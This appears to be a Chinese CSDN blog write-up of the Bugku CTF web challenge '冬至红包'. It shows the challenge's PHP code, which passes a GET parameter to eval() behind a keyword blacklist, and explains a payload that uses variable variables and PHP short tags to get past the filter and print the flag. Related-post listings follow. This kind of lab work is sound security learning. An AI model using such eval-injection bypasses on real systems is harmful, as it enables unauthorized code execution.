Bugku:冬至红包

最新推荐文章于 2022-12-25 21:39:02 发布
最新推荐文章于 2022-12-25 21:39:02 发布
阅读量828 收藏 2
点赞数 4
分类专栏: Bugku CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/112973722
版权

这题是一题代码审计

<?php
    error_reporting(0);
    require __DIR__.'/flag.php';

    $exam = 'return\''.sha1(time()).'\';';

    if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }
    else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }
    else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }
    else if (eval($_GET['flag']) === sha1($flag)) {
        echo $flag;
    }
    else {
        echo '马老师发生甚么事了';
    }

    echo '<hr>';

    highlight_file(__FILE__);

第一个判断

if (!isset($_GET['flag'])) {
        echo '<a href="./?flag='.$exam.'">Click here</a>';
    }

要求我们利用get来传入flag。

第二个判断

else if (strlen($_GET['flag']) != strlen($exam)) {
        echo '长度不允许';
    }

要求我们传入的flag与exam一样长
点击click here可以得到关于长度的提示?flag=return’30c0039cc0a2ca757d3e48d20821727f43be1c14‘;
第三个判断

 else if (preg_match('/`|"|\.|\\\\|\(|\)|\[|\]|_|flag|echo|print|require|include|die|exit/is', $_GET['flag'])) {
        echo '关键字不允许';
    }

过滤了一堆的字符但是存在一个$_GET['flag'],可以被利用在任意代码执行上。
尝试构造一个payload

?flag=$a='fla*';$a{3}='g';?>11111111111111111;<?=$$a;?>

得到flag
在这里插入图片描述
这题的payload利用了php短标签<?=可以替代<?echo
然后$$a这个利用了php的可变变量。

<?php
     $a = "hello";      //声明一个不同的变量 $a 值为 hello
     $$a = "world";     //声明一个可变变量 $$a,相当于 $hello 的值是 world
 	 echo "$a $hello";  //输出 hello world

{}可以替代[]在数组中。

FW_ENJOEY
关注
专栏目录
20210221CTF小记之bugkuCTF冬至红包(短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制)
qq_45290991的博客
02-22 2340
今天做了一道很恶心的题目,话不多说,先上结果图: 我们先来分析代码: 当没有用GET方法传入flag时,会显示Click here的链接。 点击链接会用GET方法传入一串字符串$exam,后面是当前时间的一串sha1哈希值。 判断传入的flag长度与$exam是否相同,不同则显示 长度不允许 第二个判断过滤了一大堆 第三个判断传入flag的值等于flag值的哈希值,正确就输出flag。用的是严格的三个等号的比较,我们flag都不知道,哈希值更不可能知道了,== 但容易发现此处存在任意代码.
Bugku 冬至红包
qq_52671379的博客
06-18 389
Bugku 冬至红包 题目 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'; } else if (strlen(
BUGKU-WEB-冬至红包
qq_49422880的博客
05-31 251
冬至红包   上题目,每次都要读PHP代码,本身就没有学过,碰到不懂的函数得一个一个查,关键是题目还不能确定是不是自己想得那个意思。 <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'"&
bugku web 冬至红包
m0_58189778的博客
08-19 196
题目:bugku 冬至红包 知识点:命令执行、{}的用法、<?= ?> 工具: 解题: 点开链接: 代码审计: $exam= return'20bd0ee711140119120c8e5e7d08f39ded52c7e3'; 设置?flag len(flag)==len($exam) 不匹配正则 到达此处有一个命令执行漏洞 有一个问题是eval(),如果我们使用return获取命令执行的返回值,使其与sha1($flag)相等,必然要使用到函数,但是匹配.
Bugku冬至红包记录Check via eval
m0_49762339的博客
01-20 459
写在前面: 这道题过滤太阴间了,这我是看了大佬的题解才有的启发。 WP: 代码: <?php error_reporting(0); require __DIR__.'/flag.php'; $exam = 'return\''.sha1(time()).'\';'; if (!isset($_GET['flag'])) { echo '<a href="./?flag='.$exam.'">Click here</a>'
代码之征·冬至
m0_73909276的博客
12-25 157
课后总结
冬至短信:冬至祝福语.doc
12-22
冬至】是中国传统文化中的一个重要节气,标志着一年中最寒冷的时期即将来临。在这个特殊的日子里,人们有互赠祝福和聚餐的传统,尤其是吃【饺子】,寓意着团聚和温暖。短信中的祝福语表达了对亲朋好友的关心与祝愿...
solstice-challenge:冬至后端编码挑战
04-29
冬至后端编码挑战-联系人REST API 安装与设定 要运行该应用程序,您需要具备以下条件: 对于数据库连接,请在application.properties文件中替换您的配置 spring.datasource.url = jdbc:mysql://{Host_or_IP}:{port}...
宏观年报:冬至阳生待春来-0118-浙商期货-21页.pdf
最新发布
07-25
宏观年报:冬至阳生待春来-0118-浙商期货-21页.pdf
房地产行业资金链风险分析:冬至阳生春又来.pdf
01-08
【房地产行业资金链风险分析】 本报告主要针对房地产行业的资金链风险进行深入研究,通过对比历史数据,揭示当前行业面临的资金紧张状况,并预测行业未来发展趋势。报告指出,2022年第二季度可能是行业资金链的低谷...
ctfshow 红包题第一弹
yao_xin_de_yuan的博客
07-31 904
红包题第一弹 import base64 import zipfile for i in range(1,87): with zipfile.ZipFile(str(i)+".zip",'r') as z: file = z.namelist()[0] z.extract(file) flag = "" for i in range(1,87): ...
BugkuCTF中套路满满的题-------Welcome to the bugku
qq_42133828的博客
01-24 1835
这套题目主要涉及到的知识是php伪协议,若是不了解这个的话,这道题目基本就out了。。。 当然,不了解的小伙伴,可以到这位大佬的博客去瞅瞅https://www.freebuf.com/column/148886.html 其实总结之后,最常所用到的不过是php://input(将文件的内容读出)以及php://filter/read=convert.base64-encode/resourc...
BugKuCTF 杂项 签到题
无限迭代中......
09-02 1305
https://ctf.bugku.com/files/a45ef3c87135eabd7d472d5a60d86447/qrcode_for_gh_d10dfd684f1b_258.jpg 题解:扫码关注即可
CTF笔记:bugkctf各种绕过
Ghostmey的博客
05-20 413
BUFKCTF各种绕过 打开后得到 分析 通过shal加密是的uname和passwd加密后的值相同 但是二者加密前值不同 所以可以利用shal加密处理不了数组的bug 使得null=null 从而成立 可以利用maxhackbar 构造如下 获得flag ...
[CTFSHOW][红包题]耗子尾汁
Y4tacker的博客
12-01 1648
文章目录前言前置知识代码审计简单分析函数说明以及预期解非预期解参考文章 前言 很开心今天拿了一个一血,也谢谢Firebasky师傅的题目了 前置知识 在php当中默认命名空间是\,所有原生函数和类都在这个命名空间中。普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name()这样调用函数,则其实是写了一个绝对路径。如果你在其他namespace里调用系统类,就必须写绝对路径这种写法 代码审计 简单分析 传入参数a与b,如
Bugkuctf套路满满的题--------细心
qq_42133828的博客
01-25 834
这道题目,说白了,也就是使用一下工具。。。 讲一下大概思路: 先查看源码无果  ---&gt; 御剑扫描后台一波 ---&gt; robots.txt ---&gt; 有/resusl.php文件 ---&gt; 访问/resusl.php ---&gt; 传参x=admin ---&gt; flag!! 好了,思路很清楚了,那就不截图了。。。  ...
BugKuCTF-杂项-writeup 大全?
热门推荐
疯狂棒棒糖的博客
06-20 1万+
最近玩了一个 CTF 的练习平台-----BugkuCTF下面会把一些题目的方法记录下来先讲一下杂项1.签到题只要关注公众号就可以得到 flag---开胃菜2.这是一张单纯的图片网站上打开是无法加载,将图片保存到本地是个小兔子,然后用编辑器打开图片,发现了最下面一行的 unicode 编码,解密就有 flag...
冬至节气习俗:柿子树与饺子背景PPT模板
冬至是中国传统节日之一,也是二十四节气中的第22个节气,通常出现在农历十一月二十二日左右。冬至就是指太阳到了黄经270°的时候,也就是北半球白昼最短,黑夜最长的一天。在中国,冬至被认为是一个重要的节日,...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值